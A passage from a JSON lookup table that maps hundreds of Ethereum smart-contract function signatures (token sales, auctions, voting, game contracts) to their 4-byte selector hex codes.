"0xf510ccd3", "rId()": "0x50197646", "roundDuration()": "0xf7cb789a", "Token_Description()": "0x96dbbc5f", "totalRewardToken()": "0x34145808", "minBtcValue()": "0x3f23503d", "SQUIRREL_BASE_REQ()": "0x75c9c4a4", "weth()": "0x3fc8cef3", "teamDistribute()": "0xc14edad2", "maxAmountETH()": "0xfe9b7f2f", "ActiveDigger()": "0xaf6499c5", "inviteFinished()": "0x9373ad6c", "SaleStart()": "0x37a5fbab", "crowdfundEndTime()": "0x03ff20a1", "getCofounders()": "0x70d70e9b", "ICO_Contract()": "0x5ad74742", "vrcCount()": "0xa64e920d", "stepcode()": "0x04a5288a", "sumHardCapPreICO()": "0x9aeb14a5", "getExecutive()": "0x60d12fa0", "BOUNTY_WALLET()": "0xdc6055dd", "SaleHasEnded()": "0x8531bb56", "totalSzaboInBids()": "0xcb1fc7bc", "minimumPriceInDailyAuction()": "0x053f7492", "ethToWei()": "0xeffd88b7", "eosTokenAddress()": "0xcb2971b1", "largeContribPercentage()": "0xe84818bc", "burnedToDate()": "0xf6cabaa0", "tradeTracker()": "0xda147d32", "ownerManualMinter()": "0x8733d130", "makersCount()": "0x70d37810", "addrFinance()": "0x82cb9df9", "minedToken()": "0xedfffca0", "referralProgrammeWallet()": "0x5b715ae0", "beneficiaryWallet()": "0xc9788631", "burntTokens()": "0xfa20e77d", "BP_IMMORTAL()": "0xe26a687f", "vmaxEtherPerPurchase()": "0x329ccce1", "secondDiscountCap()": "0xe2fa5fb1", "VUP_TOKEN_SUPPLY_TIER2()": "0xfeb371cd", "stopToken()": "0xd21c700f", "officialFacebook()": "0x4e58e920", "MINT_INTERVAL_SEC()": "0xe31d3938", "woodAddress()": "0x6e5390d2", "salesPipe()": "0x9f961c5a", "burnerAddress()": "0xe6293e23", "trustedContractAddr()": "0xe40418a0", "cityPoolCutPercentage()": "0xf9dcef27", "releaseAmountPerDay()": "0x08cb4cb5", "CORNERSTONEAMOUNT()": "0x72078e3b", "pollCompleted()": "0x69a683f1", "NUMBER_OF_BOOSTERS()": "0xe2f2eb27", "dividendDistributionEndTime()": "0x21f2ed2e", "toBeDistributedFree()": "0x591a6ec4", "periodicity()": "0xf4462d04", "TOTAL_ROUNDS()": "0xce8dc388", "pricePerEther()": "0x3954b4ee", "milieurs_per_eth()": "0x5cdcf33d", "phase_1_token_price()": "0x853b59d7", "MINTING_HARDCAP()": "0x81cda317", "dest()": "0x84b366dc", "freezingStatus()": "0xc2bf1af7", "trophyAddress()": "0x72712bb8", "getTotalDonateWEIInfo()": "0xf8801631", "preIcoWasSuccessful()": "0x92414146", "numberOfItemsForSale()": "0x3a3d12d4", "numberOfHalvings()": "0x2d328551", "totalTokenRewards()": "0x3de3fbd9", "poolMaxAmount()": "0x63591d09", "seedHash()": "0xc2b373a7", "isIcoFinish()": "0xdd58f5d9", "WALLET()": "0x6d9cdbc6", "Short()": "0x90236e76", "ido()": "0xeeb522aa", "masternode()": "0x6d8f4221", "bonusOver100ETH()": "0xad00129e", "get_CountProfitsToken()": "0x1fc87587", "checkBurnTokens()": "0x0c92b17b", "BitrootCoin()": "0x7d0e6aa9", "icoThresholdBonus2()": "0xab7aa65d", "companyTimelock()": "0x8cc519bf", "ADVISORS_MONTHLY()": "0x69ab8c76", "honestisFort()": "0x133b5ba9", "rewardStartTime()": "0x2cc138be", "rateTier2()": "0x57902a75", "limitDateSale()": "0x65497caf", "saleEnd4()": "0x12addb94", "percentForCommunity()": "0x968d1cff", "maxEthCapSellInFp()": "0x279fe967", "getICOStage()": "0xe2646a9f", "transferProposal()": "0xbd2302fc", "saleEndUnixTime()": "0x7c7d809b", "miningFivePlat()": "0x0aa59fe3", "officalHolding()": "0xb92cd8f1", "UNLOCK_TEN_PERCENT_PERIOD()": "0xdf55f529", "totalCrowdCoin()": "0x6e224034", "is_entity(address)": "0x9c8615ac", "getVote()": "0x0242f351", "testVote()": "0x860c5ed6", "startCirculation()": "0x20190ccd", "STQToken(address[])": "0x1b7be47e", "__toDecimals(uint256)": "0xff272ad4", "__formatDecimals(uint256)": "0x0b4aca45", "setMigrateContract(address)": "0x4a36df25", "TianLianCoin(uint256,uint256)": "0xf6a56bcf", "getFeedBackFeeAward(string)": "0x2d571013", "setFeedBackFee(string,uint256)": "0x7db1c36f", "setFee(string,uint256)": "0xcafe0e90", "chainWith(uint256,uint256)": "0xa92950f6", "bounty_solve(address,bytes32)": "0x0fbc0cd1", "remove_bounty()": "0x4e272768", "increase_bounty(address)": "0xfde7c834", "add_bounty(uint256,bytes32)": "0x527749a4", "get_solved(address)": "0xc7956846", "get_reward(address)": "0xdbf2f3c2", "getUncompensatedContributors(uint256,uint256)": "0xb9bf068e", "getContributor(address)": "0x3d8270f5", "getConfiguration()": "0x6bd50cef", "getContribPeriod()": "0xe6f9476a", "claimTokensFromTokenAiNetworkToken(address)": "0x5a3c0287", "finalizeContributionEvent()": "0x8c5597fd", "enableTokenAiTransfers()": "0x2cedc5ec", "setTokenAiNetworkToken(address)": "0xf720ef08", "setMinContribAmount(uint256)": "0x035d37a8", "enableContribPeriod()": "0x51ed96b9", "setContribPeriod(uint256,uint256,uint256,uint256,uint256)": "0x23bba494", "stageForDate(uint256)": "0x3cf6ed95", "allocatePresaleTokens(address,uint256,uint256)": "0x6938d9b0", "compensateContributors(uint256,uint256)": "0xfdd96ae0", "contributeWithAddress(address)": "0x7b3aa441", "isContribPeriodRunning()": "0xcfefe5a2", "TokenAiContribution(address,address,address,address,address,address,address)": "0xd3419d4e", "test_2_ensureProposalExecution_increaseBlocksBy100()": "0x2754ff69", "test_1_ensureVoteWorks_increaseBlocksBy100()": "0xdac05adc", "test_0_ensureControllerWorks()": "0x8b10297c", "KillContract()": "0x5b0cfcd8", "GetBalance(address,address)": "0x19be65f0", "SendAmount(address,address,uint256)": "0xfc4db64e", "SplitAmount(address,address,uint256)": "0x02e99e16", "Accounts(address,address)": "0x35a8076b", "SmallProject()": "0x39a1e9ff", "ShapeshiftBotLookup()": "0x4b7e23b3", "register(bytes32,bytes32,bytes32,bytes32)": "0x231e0750", "broadcast(string)": "0x0cd0563b", "getChannelInfo()": "0x30d281e0", "Channel(string)": "0xcfd938df", "repoAppId()": "0xc50ec10a", "newClonedRepo()": "0x02c71d92", "_newRepo(string,address)": "0xc32221cf", "newRepoWithVersion(string,address,uint16[3],address,bytes)": "0x32ab6af0", "newRepo(string,address)": "0xb0927de7", "GenesisToken()": "0xb32c6a25", "getTrustState()": "0x8ac9fa73", "getTrusteeIndex()": "0xcf18811f", "getTrusteeTable()": "0xa1e66038", "getPortfolioTable()": "0xe1f86887", "assetManagement(address)": "0x116d816b", "resignTrustee()": "0x93a5a9da", "editTrustee(address)": "0x07b9ac2c", "acceptTrustSC(address)": "0x3bd575fa", "setInitialState(address)": "0xf4016ac3", "Trust(address[],uint256,address,bytes)": "0xa084af95", "RLC()": "0x5914589c", "changeName(bytes,bytes)": "0xa07c8ed9", "getCertificate(uint256)": "0x51640fee", "findCertificate(bytes)": "0xaf371115", "addCertificate(bytes,bytes,bytes,address)": "0x51c74a9e", "SmartexInvoice(address,address)": "0x4c1ccadf", "chainedFunctions()": "0x20b652ba", "allLinesWrong()": "0x107169c5", "thirdLineWrong()": "0xb890de6b", "secondLineWrong()": "0x8fce0ee7", "firstLineWrong()": "0xc9651729", "singleLineWrong()": "0xb00d4c75", "Github()": "0xeb4435a3", "iterateNext(uint256)": "0x4cd06a5f", "upgradeGreatCoin(address)": "0x4c4c23dd", "addOrderContract(address)": "0xa283f907", "isDeploymentAdmin(address)": "0x3ca8b002", "GxTraders(address)": "0xdda55b18", "dollarBalance(address)": "0x4021581a", "coinBalance(address)": "0xfabde80c", "roundsManager()": "0x9a46793e", "minter()": "0x07546172", "livepeerToken()": "0x32c22154", "updateDelegatorWithEarnings(address,uint256)": "0xa2729a01", "updateTranscoderWithRewards(address,uint256,uint256)": "0x3e0b7eb2", "resignTranscoder(address)": "0xb6ad4784", "isActiveTranscoder(address,uint256)": "0x7c0207cb", "getTotalActiveStake(uint256)": "0x77517765", "getNextTranscoderInPool(address)": "0x235c9603", "getFirstTranscoderInPool()": "0x88a6c749", "getTranscoderPoolSize()": "0x2a4e0d55", "getTranscoderPoolMaxSize()": "0x5a2a75a9", "getDelegator(address)": "0xa64ad595", "getTranscoderEarningsPoolForRound(address,uint256)": "0x24454fc4", "privateSaleTransfer(address[],uint256[])": "0x9ab1d468", "grantTeamAdvisorToken(address)": "0xc88b77e0", "grantReserveToken(address)": "0x853a4ec2", "burnToken()": "0xfaa0a264", "buy_tokens()": "0x469c62a6", "sell_tokens(uint256)": "0x82803c22", "complete_buy_exchange()": "0x4d4765dc", "complete_sell_exchange(uint256)": "0xe33d27e4", "get_amount_get_buy(uint256)": "0x410c83a3", "get_amount_get_sell(uint256)": "0x28be67f9", "calculate_price(uint256,uint256)": "0xfa2cc19e", "market_is_open()": "0x7b3d9338", "seed_base_token()": "0x4fa9b5d5", "seed_traded_token()": "0xf9b35ca3", "set_base_token_as_seeded()": "0x28a24f30", "set_traded_token_as_seeded()": "0x3c232bb6", "withdraw_token(uint256)": "0x164fa4ef", "deposit_eth()": "0x274b3df4", "deposit_token(address,uint256)": "0xe4a1d868", "transferTokensThroughProxy(address,address,uint256)": "0x553d0d12", "PVXToken()": "0x6f6b32ad", "blacklistAddr(address[])": "0x83111397", "whitelistAddress(address[])": "0xb31d61b0", "setApprove(bool)": "0xaa1199ea", "removeAllApprove()": "0xb5caf461", "setContractAdmin(address,bool,uint256)": "0x14619c7f", "validPurchaseTokens(uint256)": "0xfc38ce19", "getDeposited(address)": "0x466bb312", "mintForOwner(address)": "0xa50d81c7", "getPeriod(uint256)": "0x4b2c0706", "CCNCrowdsale(address)": "0x8a1be474", "mint(address,uint256,address)": "0x0d4d1513", "BUYGOODSWITHCRYPTODOTCOM()": "0x08a65591", "GovcTechnicalGases()": "0xf86c4354", "merge(uint256,uint256)": "0xd1c2babb", "decompose(uint256)": "0xd40e985d", "unpauseToken(uint256)": "0x776ab634", "pauseToken(uint256)": "0xfbd395f8", "editPersonalNote(string,uint256)": "0x11f598cd", "createKT(string)": "0x5e475bb6", "setO3(address)": "0xc2506eee", "setO2(address)": "0x2d448c49", "setO1(address)": "0x1793140a", "setTokenManager(address)": "0x7cb2b79c", "buyTokensICO()": "0xd7b91bcc", "buyTokensPresale()": "0x1d511879", "EthLendToken(address,address,address)": "0x0c58bcb8", "mayjaKill()": "0xe48a4a29", "playerKiller()": "0x3b356d71", "getEmblemOwner()": "0xd2715a6b", "purchaseMysteriousEmblem()": "0xb5281b31", "createBounty(uint256)": "0x3f28e9fb", "payoutOnPurchase(address,uint256)": "0xbce0e87a", "BountyHunter()": "0xac30da84", "setPresaleFail()": "0x74068480", "updateDiscount(uint256)": "0x5d3fdd19", "updateMinimal(uint256)": "0x58669d6d", "AfeliCoinPresale(address)": "0x8c7f7806", "transferManagment(address)": "0x3bfdd7de", "transferMultiple(address[],uint256[])": "0xa05fccef", "transferAnyERC20Token(address,address,uint256)": "0xd493b9ac", "requestTokenExchange(uint256)": "0x837b68c8", "requestTokenExchangeMax()": "0x9981bd61", "pMintTokens(uint256,int256,address,uint256,uint256)": "0x491d525a", "mintTokensLockedMultiple(uint256,int256,address[],uint256[],uint256[])": "0xdebe9768", "mintTokensLocked(uint256,int256,address,uint256,uint256)": "0x01a15ee9", "mintTokensMultiple(uint256,int256,address[],uint256[])": "0xe4e1f7af", "mintTokens(uint256,int256,address,uint256)": "0xcde43f28", "openMigrationPhase()": "0x5f538fd4", "makeTradeable()": "0xa03fb4c0", "updateTokensPerEth(uint256)": "0x9ea407be", "pWhitelist(address)": "0x4fba68c5", "addToWhitelistMultiple(address[])": "0x8fe6677d", "tokensToEth(uint256)": "0x79ca9ad4", "ethToTokens(uint256)": "0xa4c89322", "firstDayTokenLimit()": "0xe74f8eff", "availableToMint()": "0x74601c3c", "isMain()": "0x604269d1", "isMainFirstDay()": "0x632e082a", "setDateMainEnd(uint256)": "0x897e47f5", "setDateMainStart(uint256)": "0xad401842", "pNumberOfLockedTokens(address)": "0x2649cb10", "unlockedTokensInternal(address)": "0x5365939c", "isAvailableLockSlot(address,uint256)": "0xd8690c22", "unlockedTokens(address)": "0x836115fe", "lockedTokens(address)": "0x5eb7413a", "registerLockedTokens(address,uint256,uint256)": "0x8be7a96a", "cancelBet()": "0x7b6d79f1", "payOwners()": "0x13352334", "returnToOwners()": "0xb01ead43", "emptyRemainingsToOwners()": "0x7baa4524", "canBet()": "0x55ec671a", "collectionsAvailable()": "0xc9deb567", "userHasWithdrawn(address)": "0x306d4ed9", "getUserBet(address)": "0xc96adb01", "determineWinner(uint256,uint256)": "0x12800751", "makeOraclizeQuery(uint256,string,string,uint256)": "0x5727e30b", "callOracle(uint256,uint256)": "0x9aee046b", "setExpectedEnd(uint256)": "0xc67e43c1", "setExpectedStart(uint256)": "0x39fdc5b7", "transferBaseOwnership()": "0xbf6f7755", "doesOwnEthHandle(bytes32,address)": "0x52911bd8", "findAddress(bytes32)": "0xec6b1d1e", "ethHandleIsRegistered(bytes32)": "0x34762a94", "getEthBase()": "0x8a157fae", "transferEthHandleOwnership(bytes32,address)": "0xba10db46", "registerEthHandle(bytes32,address)": "0xa1dddf70", "doesOwn(bytes32,address)": "0x06d00b10", "getContractTokenBalance()": "0x317d9453", "Interestv3(address,address)": "0x0fa2b5d4", "mint(address[])": "0xbd075b84", "KyberGenesisToken(address)": "0xf8fe2f9d", "FIBKAD()": "0xf39f421e", "KMEToken()": "0x1868516d", "GanaTokenPublicSale(address,address,address,uint256,uint256)": "0xf63850d0", "MPTToken(address,address,uint256,string,uint8,string)": "0xeb829aef", "getTokensBack()": "0x7d851c70", "ChangeDates(uint256,uint256,uint256,uint256)": "0xe8d50403", "WashCrowdsale()": "0x32383a69", "IbzCoin()": "0x5007ec95", "increaseDuration(uint256)": "0xb8eb115e", "decline(address,address)": "0xfdd7d87b", "approve(address,address)": "0x7e5465ba", "preICO(address)": "0x82142370", "requestNewMint(address,uint256)": "0x4b741395", "initNewGame(uint8[16])": "0xf65bed0d", "HLWCOIN()": "0x63f9cb0e", "setIndex(uint256)": "0x40a5737f", "IWWEE()": "0x67301dde", "makeCoin(uint256)": "0xebfe0f39", "DBC(uint256,string,uint8,string)": "0x18ae15e4", "setMinimumTokenSell(uint256)": "0x5e6096c5", "checkCurrentStage()": "0xe87ea055", "exchangeEtherOnTokens(address)": "0xb0f5ae72", "EXOTokenSale(address,address,address)": "0x2a4735c1", "CappedRefundableCrowdsale(uint256,uint256)": "0xa60e043e", "setOraclize(address)": "0x59e0cf23", "convertToMiniCQS(uint256)": "0x51436641", "destroyNinja(uint256)": "0xcb4153e9", "getNinja(uint256)": "0x02135534", "NinjaCore()": "0x72c5c349", "createPromoNinja(uint256,address)": "0x41541318", "extGetLock(uint256)": "0x8a653c93", "_unlockNinja(uint256,uint16)": "0x94f2ed53", "extUnlockNinja(uint256,uint16)": "0xf8d95520", "_lockNinja(uint256,uint16)": "0x5c25e903", "extLockNinja(uint256,uint16)": "0xeb533750", "extDestroyNinja(uint256)": "0xb2e37e18", "extCreateNinja(uint256,uint256,uint256,uint256,address)": "0x95ae0bf9", "removeExtension(address)": "0x21ee102b", "addExtension(address)": "0x170ff3e1", "_destroyNinja(uint256)": "0x2ecca4e6", "_createNinja(uint256,uint256,uint256,uint256,address)": "0xbde66362", "SEOToken()": "0x61ed8097", "ERC20Standard(uint256,string,bool)": "0x1dad63e4", "PPKToken()": "0x52e40d96", "Falcon()": "0x8991dede", "GoChain()": "0x94f38799", "BEEFYToken()": "0xcc77b82d", "amountOfParticipants()": "0xe2a51b8f", "amountOfBagTypes()": "0x43a8775a", "amountOfBags()": "0xbd355f43", "_transferBag(address,address,uint256)": "0x5474d4d7", "addBagAndGiftAtTime(uint256,address,uint256)": "0x26ba1c19", "addBagAndGift(uint256,address)": "0xef532a47", "addBagDelayed(uint256,uint256)": "0xf272a60c", "addBag(uint256)": "0x3221e125", "CryptoSurprise()": "0xbfb47e72", "transferBag(address,uint256)": "0x993b4f71", "buyBag(uint256)": "0x2db93fc7", "PoloneumToken()": "0xab70ee5c", "Litas()": "0x873cdb03", "DAKUToken()": "0x82bcd463", "AleKoin()": "0x79e54e6e", "getBuyers()": "0xf64bfaba", "createContract(bool,string,bool)": "0x9cf9342e", "ATTRToken()": "0x5d4a8f74", "transfer(address[],uint256[])": "0xffc3a769", "setTKC(address)": "0x7044ce75", "MultiTranser()": "0x57c6c642", "make(address,uint256,bool)": "0x86d9b0c5", "TinyProxy(address,uint256)": "0xe86cf04b", "masscreate(uint256,uint256)": "0xcb01cd02", "NEBC(uint256,string,string)": "0x89452488", "EtherBTC()": "0x880c5f3d", "wasPaid(bytes32)": "0x0bf9fd52", "getPaid(string,address)": "0xd6233491", "createLink(bytes32)": "0xabb58fd3", "PhanToken()": "0x200a252a", "dazoToken()": "0xdcda4554", "QRToken()": "0x9055bc12", "mintManual(address,uint256)": "0x8ca5da35", "mainSale(address,uint256)": "0x475a2ac6", "preSale(address,uint256)": "0x6baa2ff7", "setBackEndAddress(address)": "0xb701dc14", "setEndSale(uint256)": "0xfb3ab12b", "setStartSale(uint256)": "0xba8029bb", "setEndPreSale(uint256)": "0xe0462547", "setStartPreSale(uint256)": "0x384a6494", "setDollarRate(uint256)": "0xd2c877f8", "onERC721Received(address,uint256,bytes)": "0xf0b9e5ba", "NodeManager(address[],address[])": "0x8b8f8504", "Object()": "0x13f07f6f", "setEventsContract(address)": "0x79aa668d", "DDJETH()": "0x04d88bce", "tgeCurrentStage()": "0x5d4f012b", "delegateVote()": "0x8ab21fb6", "payOut(uint256,uint8,uint256)": "0x22526635", "schedulePayoutOraclizeCall(uint256,bytes32,uint256)": "0x74689990", "FlightDelayPayout(address)": "0x110cee6b", "setCoinTotalsContract(address)": "0xbce2bb42", "TeamTokensHolder(address,address,address)": "0x00277883", "ConfigAction()": "0x1a08a7bf", "addrToString(address)": "0xb7d534a1", "endAuction(uint256)": "0xb9a2de3a", "getRefundValue()": "0x59e54095", "placeBid(uint256)": "0x9979ef45", "getBidForAuctionByIdx(uint256,uint256)": "0x1313c739", "getBidCountForAuction(uint256)": "0x4bc32ea2", "activateAuction(uint256)": "0x53488f0a", "getActiveContractRecordConcat(string)": "0xede05887", "getAuctionIdForUserAndIdx(address,uint256)": "0x24a12edf", "getAuctionsCountForUser(address)": "0x9abb2c16", "getAuctionCount()": "0xc44e6640", "partyOwnsAsset(address,address,string)": "0x5609825e", "AuctionHouse()": "0xe2387bb6", "isElectionPeriodProposal(uint256)": "0x6f6cd9f5", "isElectionPeriod()": "0xabf2e01c", "resetElectionPeriod()": "0xad1896db", "minimumElectionQuorum()": "0xa1c9d235", "totalTokenSupply()": "0x1ca8b6cb", "shareHolderBalanceOfAtTime(address,uint256)": "0xd9946793", "changeVariables(address[],uint256[],address,address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x5ed0f3fd", "changeElection(uint256,uint256,uint256)": "0x09a44334", "ShareHolderController(address,address[],uint256[],address,uint256,uint256,uint256,uint256,uint256,uint256)": "0xf1afc4f6", "EthCoin(address)": "0x334340d2", "IntIDQuery(address)": "0x5f8c494f", "AddressQuery(address)": "0x00e063bc", "BIKQuery(address)": "0x927c60de", "CustomerInsert(string,address,string,int256)": "0x5549f46c", "KYCbit4()": "0x2f212780", "addJobContractMessage(uint256,string)": "0x8c45cf24", "EthlanceMessage(address)": "0x49de3995", "KryptopyToken()": "0x36c2a922", "BTCDOGE(uint256)": "0x7678473d", "BTCETC(uint256)": "0x5113d5f7", "BTCETH(uint256)": "0x98475e30", "USDBTC(uint256)": "0x9ba4dbc2", "queryTimestamp(uint40)": "0x17a081bf", "create(address,address,address,string,string,address,uint256,uint256)": "0xa720cbb8", "CrowdsaleFactory(address)": "0xf8f9456c", "contributeFiat(address,uint256)": "0x098eb040", "contributePreSale()": "0x59d213fe", "removeFromWhitelist(address,address)": "0xf8d3277d", "addToWhitelist(address,address)": "0x57518243", "upadateContributorsCount(uint256)": "0x79db671d", "CrowdsaleController(uint256,address)": "0x2e722561", "testCreateOrder()": "0x7774d64c", "yank(address[],address[])": "0x17733eac", "setMaxFinalizationTime(uint256)": "0x378ca888", "numberOfContributors()": "0x4377cf65", "rate()": "0x2c4e722e", "Crowdsale(uint256,address,address)": "0x469912d7", "notIn(bytes32[],bytes32)": "0x1b2a8715", "removeCandidates()": "0xdd7bff82", "addSecondPreferences(bytes32[],bool)": "0x4e9384da", "getLastCandidates()": "0x6ace7d87", "getWinners()": "0xdf15c37e", "vote(bytes32,bytes32)": "0xeeaaf19d", "BallotPreferential()": "0xc0d129d4", "validate(address,address,bytes32,address,uint256,bytes32,address,uint256,bytes32,uint256,uint256)": "0x354d68f2", "post(bytes)": "0xbaf9b369", "Message()": "0xa1fb1de9", "getImpactValue(string,address)": "0xa22cd657", "getImpactDonor(string,uint256)": "0x64a20e2d", "getImpactUnmatchedValue(string)": "0xe1a05087", "getImpactTotalValue(string)": "0x5e3045c8", "getImpactLinked(string)": "0x72cd5576", "getImpactCount(string)": "0x0ba1f7ad", "getAccountsCount()": "0x770e3106", "updateBalance(uint256,uint256)": "0x58453fef", "registerImpact(string,uint256,uint256)": "0x51ba5f04", "registerOutcome(string,uint256)": "0x52314508", "setMasterContract(address)": "0x2a3a236f", "ImpactRegistry(address)": "0xda05277e", "undistributedTokens()": "0x56a7564e", "icoController(address)": "0xf82fb363", "Ehfirst()": "0x17219f03", "mintTokens2(int256,address,uint256,uint256)": "0x11b4bbdb", "mintTokens1(int256,address,uint256,uint256,bytes32)": "0x9d7da479", "stopStage()": "0xae1c4062", "currentTokenPrice()": "0x71b3659e", "startStage(uint256,uint256,uint256)": "0x6cdacfc4", "setVestingManager(address)": "0x15d7b2c4", "declineBid(string,uint64)": "0xba78c773", "acceptBid(string,uint64)": "0x70d60adf", "bid(string,string,uint256)": "0x0e6ae3fb", "addListing(string,string,uint256)": "0x298c154e", "payTip()": "0x638e1e5d", "setInflation()": "0x5021051e", "appendPricePoints(uint64[])": "0x1d7add35", "setPricePoints(uint64[])": "0xd63581de", "getPricePoint(uint256)": "0x657f3ab0", "getPricePointsLength()": "0xdbe9eebf", "setSetupCompleted()": "0x57835720", "setContracts(address[16])": "0xf5ea15d3", "getBdpPriceStorage(address[16])": "0x8f71f3cb", "getBdpOwnershipStorage(address[16])": "0xaf1ee630", "getBdpImageStorage(address[16])": "0xded5bc6c", "getBdpDataStorage(address[16])": "0x9daf57cf", "getBdpControllerHelper(address[16])": "0x10fe42b8", "getBdpController(address[16])": "0x2b4bdf76", "getBdpEntryPoint(address[16])": "0x1e2b6db2", "finished()": "0xbef4876b", "checkIfFundingCompleteOrExpired()": "0x86f32586", "setDeadline(uint256)": "0x195199f6", "setStage2Start(uint256)": "0xf0ea0294", "ASFBToken()": "0x10ebb38d", "devWithdraw()": "0xad606c72", "resetPhoenixes()": "0x2279295d", "endGame()": "0x6cbc2ded", "distributeTeamCut(bool,uint256)": "0xcac07bbf", "decreasePower(uint256)": "0x5ecf71c5", "decreasePrice(uint256)": "0x7ab13461", "useAbility(uint256)": "0x5d161c3f", "useCaptainAbility(uint256)": "0x71ee329f", "upgradePhoenixStats(uint256)": "0x2d29842c", "calculatePoolCut(uint256)": "0x4ba336e5", "distributeDevCut(uint256)": "0x83bd5f42", "calculateCuts(uint256,uint256)": "0x133fe629", "purchasePhoenix(uint256)": "0xa48296d9", "setPhoenixOwners(address[19])": "0xa340295a", "createPhoenixes()": "0x14793058", "CryptoPhoenixesCivilWar(address,address)": "0xb2467742", "checkLockedToken()": "0x5c13d06f", "startDist()": "0x270a3856", "setLockedConfig(address[],uint256[],uint256[])": "0x4c47e9ee", "setDistConfig(address[],uint256[])": "0x9d176556", "TICDist(uint256)": "0x3bb8bd85", "DSToken(string,string)": "0x4b4bb75b", "Contractbalance()": "0x09929628", "withDrawBack()": "0x53954574", "tweakRefundStatus()": "0x208a9e37", "releaseEQUITokens(bytes32,uint8,bytes32,bytes32)": "0x9b855a85", "unlockedBalance(address)": "0x5e0fac2e", "updateEQUIPrice(uint256)": "0x991f6798", "updateRoundLimits(uint256)": "0xd2b3fe93", "isWhitelistedAddress(bytes32,uint8,bytes32,bytes32)": "0xe86f6699", "disableKYC()": "0x9df9a1db", "enableKYC()": "0xaae3d031", "FreeCoin(uint256,string,string)": "0x9cb15a94", "NeuroWire()": "0x5916c2c9", "getOwnerCount()": "0xef18374a", "emitTokens(address,uint256)": "0xf11b9fc8", "CarTaxiToken(address)": "0x32414926", "dateBonus(uint256)": "0x9af95a4b", "volumeBonus(uint256)": "0x4168614a", "presaleVolumeBonus(uint256)": "0x1da3f151", "mulByFraction(uint256,uint256,uint256)": "0xabe24a3d", "PieToken()": "0x94abbeaf", "PieTokenBase()": "0xce14d404", "stopIt()": "0x225f9d7d", "thankYou(address)": "0x29a2aa2d", "setOraclizeCallbackGasPrice(uint256)": "0x410a68b5", "setOraclizeCallbackGas(uint256)": "0xedc65c83", "setNextRoundFee(uint256)": "0xe93d3e5f", "setNextRoundDonation(uint256)": "0x87801cc3", "setNextRoundDuration(uint256)": "0x491cfc1c", "setNextRoundMaxDonors(uint256)": "0xfa9f117f", "startNextRound()": "0x3c3ccc44", "endRoundAndStartNextRound()": "0x7d92654c", "startRound(address)": "0x037051eb", "Cillionaire()": "0x9f8e8209", "TestRushCoin()": "0x6d97537a", "CTCToken()": "0x955b5e72", "getPanda(uint256)": "0x1327fbe5", "PandaCore()": "0x87925132", "createGen0Auction(uint256[2])": "0x855f2b3a", "buyPandaERC20(address,address,uint256,uint256)": "0xa3b922ca", "createPanda(uint256[2],uint256,uint256)": "0x9505b2a7", "createWizzPanda(uint256[2],uint256,address)": "0x53a01f68", "switchSaleAuctionERC20For(address,address,uint256)": "0x2d370378", "createSaleAuctionERC20(uint256,address,address,uint256,uint256,uint256)": "0x1d010815", "setSaleAuctionERC20Address(address,address)": "0x5326ba37", "_bidERC20(address,address,uint256,uint256)": "0x0e4e5d93", "withdrawERC20Balance(address,address)": "0x1c338644", "bidERC20(uint256,uint256)": "0xfd3c4cbf", "createAuction(uint256,address,uint256,uint256,uint256,address)": "0xc82531a3", "erc20ContractSwitch(address,address,uint256)": "0xc4d7b98f", "SaleClockAuctionERC20(address,uint256)": "0x0eb43fe3", "packageCount()": "0xee0ebe0c", "surprisePanda()": "0x20caea39", "createPanda(uint256,uint256)": "0x42577935", "createGen0Auction(uint256,uint256,uint256,uint256,address)": "0xf40e28f2", "giveBirth(uint256,uint256[2],uint256[2])": "0xf3746947", "_breedWith(uint256,uint256,address)": "0x94993e52", "_exchangeMatronSireId(uint256,uint256)": "0x085a3600", "_createPanda(uint256,uint256,uint256,uint256[2],address)": "0xc2507ef7", "getWizzTypeOf(uint256)": "0x4e61efc5", "setTotalWizzPandaOf(uint256,uint256)": "0xb380beac", "saleExchangeRate2()": "0xeb32cf9b", "tickets100price()": "0x6982c6f4", "gameMaxBetAmount()": "0x51401d4d", "canMint()": "0xbeb9716d", "sellOpen()": "0x900726c2", "vote_until()": "0x46d7195d", "FUND_FRAC_TOP()": "0x3995943b", "presaleConcluded()": "0xe9deb98c", "memberFee()": "0xd3098883", "lastCheckedToken()": "0x3fd68ca7", "getCanLoanAmount()": "0xe14acc04", "gunsFund()": "0x232e9051", "cancelTransaction()": "0x5c8cf750", "ETH_PRICE_USD()": "0x06ec9b9e", "tail()": "0x13d8c840", "startPreSaleRound()": "0xaa2580c1", "BuyHORSEtokens()": "0x6ed5777e", "PreIcoWallet()": "0xd816187f", "getSelfGroupsContributedTo()": "0xd19d1912", "engCommunityAddress()": "0x20104dca", "authorizedAddress()": "0x5539d400", "totalEarning()": "0xf74279b0", "totalETHSold()": "0xd59e31ed", "AmericoTokenToken()": "0xe4aa0741", "userRegistry()": "0x5c7460d6", "requestedTokens()": "0xf813f027", "periodStart()": "0xeda4e6d6", "lastBlock_v7()": "0x742d9f0b", "available_tokens()": "0xa2187de0", "tickets10kprice()": "0x11e0de8b", "token_swap_supply()": "0xaca7dcfe", "phasePresale_From()": "0x7eb6634c", "starbaseEarlyPurchase()": "0x36cfe3eb", "walletSplitPercentage()": "0xf829d1a0", "_startBetBlock()": "0xfa6fcc50", "foundersRewardsMinted()": "0x0d1dcd74", "REWARD_FORWARD_POSITION()": "0x4bc3b153", "getEncPubkey()": "0x69cbb042", "DipTokensale()": "0xe63b6b87", "namiCrowdSaleAddr()": "0x7e9d7f68", "subscribers_TO_HATCH_1CraigGrant()": "0xe45b7388", "seeleToken()": "0x55212c89", "notaryBookSize()": "0xe129c99d", "gapInPrimaryCrowdsaleAndSecondaryCrowdsale()": "0x7c1c05dd", "normalRoomMin()": "0x6cbaecbd", "SALE_TOKENS_SUPPLY()": "0x9c93a52f", "totalTokenMintedOpen()": "0x8b325902", "isStoppingIcoOnHardCap()": "0x64c487ef", "numberSyndicateMembers()": "0xa721ebe8", "prepaidUnits()": "0x6e9c4650", "preBuyPrice2()": "0xdbc65f85", "privateSell2Token()": "0xeac533e1", "PRESALE_ETH_RAISE()": "0x6a745ce9", "getListGames()": "0x2112e7fe", "addressCount()": "0x9d80c818", "solidityCompileVersion()": "0x7b907094", "usageCost()": "0xd54c4726", "precision()": "0xd3b5dc3b", "ROUND_DURATION()": "0x6641ea08", "_price_token_ICO2()": "0xa913eb24", "percentFeeTimes100()": "0xf277010d", "totalTokenToSale()": "0x1067f361", "_receiveEth()": "0x9478f7cf", "debugVal3()": "0x07b1470c", "minimalToken()": "0xd72eabb8", "EARLY_FOUNDERS_USD()": "0xd1bc62de", "tokenBonus()": "0x7064d509", "outputAddress()": 